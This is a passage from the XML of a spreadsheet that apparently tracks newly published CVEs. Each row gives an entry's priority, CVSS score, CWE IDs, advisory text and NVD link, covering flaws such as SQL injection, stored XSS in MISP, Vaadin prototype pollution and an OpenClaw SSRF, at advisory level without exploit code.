      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="inlineStr"/>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="K130" s="5" t="inlineStr"/>
      <c r="L130" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q130" s="5" t="inlineStr"/>
      <c r="R130" s="5" t="inlineStr">
        <is>
          <t>CWE-189, CWE-190</t>
        </is>
      </c>
      <c r="S130" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Blosc C-Blosc2 up to 3.3.2. This impacts the function blosclz_decompress of the file blosc/blosclz.c of the component blosclz Decompression. Executing a manipulation can lead to integer overflow. The attack may be launched remotely. A high complexity level is associated with this attack. The exploitability is said to be difficult. Upgrading to version 3.3.3 will fix this issue. This patch is called fe2964d114d97847f56570a0ab2be2c57ccbeedc. The affected component should be upgraded.</t>
        </is>
      </c>
      <c r="T130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103222</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103540</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="inlineStr"/>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K131" s="5" t="inlineStr"/>
      <c r="L131" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q131" s="5" t="inlineStr"/>
      <c r="R131" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-791</t>
        </is>
      </c>
      <c r="S131" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in formtools.org Form Tools up to 3.1.1. This vulnerability affects the function Clients::updateClientSettingsTab of the file global/code/Clients.class.php of the component Client Settings. The manipulation of the argument page_titles leads to improper neutralization of special elements used in a template engine. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103540</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103541</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="inlineStr"/>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K132" s="5" t="inlineStr"/>
      <c r="L132" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q132" s="5" t="inlineStr"/>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-434</t>
        </is>
      </c>
      <c r="S132" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in formtools.org Form Tools up to 3.1.1. This issue affects the function Files::uploadFile of the file global/code/actions.php of the component Ajax Handler. The manipulation results in unrestricted upload. It is possible to launch the attack remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103541</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103543</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="inlineStr"/>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K133" s="5" t="inlineStr"/>
      <c r="L133" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q133" s="5" t="inlineStr"/>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S133" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in itsourcecode Leave Management System 1.0. The affected element is an unknown function of the file /module/leavetype/controller.php. Such manipulation of the argument LEAVTID leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="T133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103543</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91860</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>security@vaadin.com</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="inlineStr"/>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr">
        <is>
          <t>npm, maven, gin</t>
        </is>
      </c>
      <c r="K134" s="5" t="inlineStr"/>
      <c r="L134" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q134" s="5" t="inlineStr"/>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="S134" s="5" t="inlineStr">
        <is>
          <t>A prototype pollution vulnerability exists in the deep merge helpers of Vaadin Charts and Vaadin Component Base. Merging an object the application does not control into a chart configuration or into a component's i18n property writes onto Object.prototype, making the injected properties visible to every object in the running application.
Users of affected versions should apply the following mitigation or upgrade. Releases that have fixed this issue include:
Product version
Vaadin 23.0.0 - 23.6.13
Vaadin 24.0.0 - 24.9.20
Vaadin 24.10.0 - 24.10.9
Vaadin 25.0.0 - 25.1.11
Vaadin 25.2.0 - 25.2.6
Mitigation
Upgrade to 23.6.14
Upgrade to 24.9.21
Upgrade to 24.10.10
Upgrade to 25.1.12
Upgrade to 25.2.7 or newer
Please note that Vaadin versions 10-13 and 15-22 are no longer supported and you should update either to the latest 23, 24, 25 version.
Artifacts
Maven coordinates Vulnerable versions Fixed version
com.vaadin:vaadin 23.0.0 - 23.6.13 &gt;=23.6.14
com.vaadin:vaadin 24.0.0 - 24.9.20 &gt;=24.9.21
com.vaadin:vaadin 24.10.0 - 24.10.9 &gt;=24.10.10
com.vaadin:vaadin 25.0.0 - 25.1.11 &gt;=25.1.12
com.vaadin:vaadin 25.2.0 - 25.2.6 &gt;=25.2.7
com.vaadin:vaadin-core 24.7.0 - 24.9.20 &gt;=24.9.21
com.vaadin:vaadin-core 24.10.0 - 24.10.9 &gt;=24.10.10
com.vaadin:vaadin-core 25.0.0 - 25.1.11 &gt;=25.1.12
com.vaadin:vaadin-core 25.2.0 - 25.2.6 &gt;=25.2.7
com.vaadin:vaadin-charts-flow 23.0.0 - 23.6.13 &gt;=23.6.14
com.vaadin:vaadin-charts-flow 24.0.0 - 24.9.20 &gt;=24.9.21
com.vaadin:vaadin-charts-flow 24.10.0 - 24.10.9 &gt;=24.10.10
com.vaadin:vaadin-charts-flow 25.0.0 - 25.1.11 &gt;=25.1.12
com.vaadin:vaadin-charts-flow 25.2.0 - 25.2.6 &gt;=25.2.7
npm packages
npm package Vulnerable versions Fixed version
@vaadin/charts 23.0.0 - 23.6.4 &gt;=23.6.5
@vaadin/charts 24.0.0 - 24.9.17 &gt;=24.9.18
@vaadin/charts 24.10.0 - 24.10.4 &gt;=24.10.5
@vaadin/charts 25.0.0 - 25.1.11 &gt;=25.1.12
@vaadin/charts 25.2.0 - 25.2.8 &gt;=25.2.9
@vaadin/component-base 24.7.0 - 24.9.17 &gt;=24.9.18
@vaadin/component-base 24.10.0 - 24.10.4 &gt;=24.10.5
@vaadin/component-base 25.0.0 - 25.1.11 &gt;=25.1.12
@vaadin/component-base 25.2.0 - 25.2.8 &gt;=25.2.9</t>
        </is>
      </c>
      <c r="T134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91860</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103388</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="inlineStr"/>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K135" s="5" t="inlineStr"/>
      <c r="L135" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q135" s="5" t="inlineStr"/>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S135" s="5" t="inlineStr">
        <is>
          <t>MISP renders the source field of a Galaxy Cluster as a clickable hyperlink whenever the stored value passes PHP's FILTER_VALIDATE_URL validation. Because FILTER_VALIDATE_URL accepts the javascript: URI scheme, a user with galaxy editor privileges on the local instance or on a synced instance could store a javascript: URL as the cluster source.
When another user views the affected Galaxy Cluster and clicks the rendered link, the embedded script executes in the victim's browser context, enabling session hijacking, data exfiltration, or actions performed on behalf of the victim.
Preconditions:
- Attacker must hold galaxy editor privileges (local or via sync).
- Victim must view the affected cluster and click the malicious link.
Impact:
- Stored cross-site scripting (XSS) in the victim's browser.
- Potential session theft, credential harvesting, or unauthorized actions within the MISP application.
Affected: &lt;2.5.48.</t>
        </is>
      </c>
      <c r="T135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103388</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103389</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="inlineStr"/>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K136" s="5" t="inlineStr"/>
      <c r="L136" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q136" s="5" t="inlineStr"/>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-79</t>
        </is>
      </c>
      <c r="S136" s="5" t="inlineStr">
        <is>
          <t>MISP contains a stored cross-site scripting (XSS) vulnerability in the galaxy icon handling path. The icon field of a galaxy object was persisted without any server-side validation through the galaxy add, edit, and sync/import capture endpoints. The stored value was subsequently concatenated directly into HTML markup by the D3-based correlation graph rendering scripts (both the default and Overmind themes) using the .html() method.
A user holding the perm_galaxy_editor permission, which is granted to the stock User role, could store arbitrary HTML or JavaScript in the icon field. Any other user who opened the correlation graph of an event containing a cluster belonging to that galaxy would have the injected script executed in their browser session.
Impact:
- Arbitrary script execution in the context of the victim's MISP session
- Potential theft of session credentials, manipulation of displayed data, or initiation of actions on behalf of the victim
- Affects both the default and Overmind UI themes
Affected versions: &lt;2.5.48</t>
        </is>
      </c>
      <c r="T136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103389</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55174</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="inlineStr"/>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K137" s="5" t="inlineStr"/>
      <c r="L137" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q137" s="5" t="inlineStr"/>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-347</t>
        </is>
      </c>
      <c r="S137" s="5" t="inlineStr">
        <is>
          <t>UltrafastSecp256k1 is a high-performance, multi-backend secp256k1 engine with reproducible audit evidence, compatibility shims, and profile-based review scopes. Prior to version 4.2.0, UltrafastSecp256k1's ECDSA adaptor pre-signature verification accepts forged adaptor pre-signatures whose "r" value is not cryptographically bound to the adaptor point "T". This issue has been patched in version 4.2.0.</t>
        </is>
      </c>
      <c r="T137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55174</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103397</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="inlineStr"/>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K138" s="5" t="inlineStr"/>
      <c r="L138" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q138" s="5" t="inlineStr"/>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S138" s="5" t="inlineStr">
        <is>
          <t>OpenSave before 2.4.0-beta.1 fails to validate sender identity in WAN relay requests, allowing unpaired room members to impersonate paired devices by spoofing the RelayMessage From field. Attackers who know the room code can join, read paired peer identifiers from announcements, and send forged requests to access protected sync routes including save data, snapshots, and file operations.</t>
        </is>
      </c>
      <c r="T138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103397</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103230</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="inlineStr"/>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr">
        <is>
          <t>mysql, php, hp</t>
        </is>
      </c>
      <c r="K139" s="5" t="inlineStr"/>
      <c r="L139" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q139" s="5" t="inlineStr"/>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S139" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in AdithyaYelloju Restaurant-Management-System up to 7f0e7e84255e8fcfd488e83f8f91451bbbff6b9c. Impacted is the function mysqli_query of the file User/ord.php of the component Order Placement. Executing a manipulation of the argument id/name can lead to sql injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103230</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103232</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="inlineStr"/>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr">
        <is>
          <t>mysql, php, hp</t>
        </is>
      </c>
      <c r="K140" s="5" t="inlineStr"/>
      <c r="L140" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q140" s="5" t="inlineStr"/>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S140" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in AdithyaYelloju Restaurant-Management-System up to 7f0e7e84255e8fcfd488e83f8f91451bbbff6b9c. This affects the function mysqli_query of the file admin/table_booking.php. This manipulation of the argument Name causes sql injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103232</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97238</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="inlineStr"/>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K141" s="5" t="inlineStr"/>
      <c r="L141" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q141" s="5" t="inlineStr"/>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S141" s="5" t="inlineStr">
        <is>
          <t>Subscriber Cross Site Scripting (XSS) in JetEngine &lt;= 3.8.14.3 versions.</t>
        </is>
      </c>
      <c r="T141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97238</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100261</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="inlineStr"/>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K142" s="5" t="inlineStr"/>
      <c r="L142" s="5" t="inlineStr"/>
      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q142" s="5" t="inlineStr"/>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="S142" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18991 changing article visibility settings was possible without update permission</t>
        </is>
      </c>
      <c r="T142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100261</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101883</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="inlineStr"/>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K143" s="5" t="inlineStr"/>
      <c r="L143" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q143" s="5" t="inlineStr"/>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S143" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Windows Node through 2026.9.4 contains a server-side request forgery vulnerability in the canvas.present capability that bypasses URL risk evaluation enforced by canvas.navigate. Attackers with gateway or agent access can issue canvas.present to make the node's WebView send requests to localhost, private networks, or tailnet services from the user's machine.</t>
        </is>
      </c>
      <c r="T143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101883</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103589</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
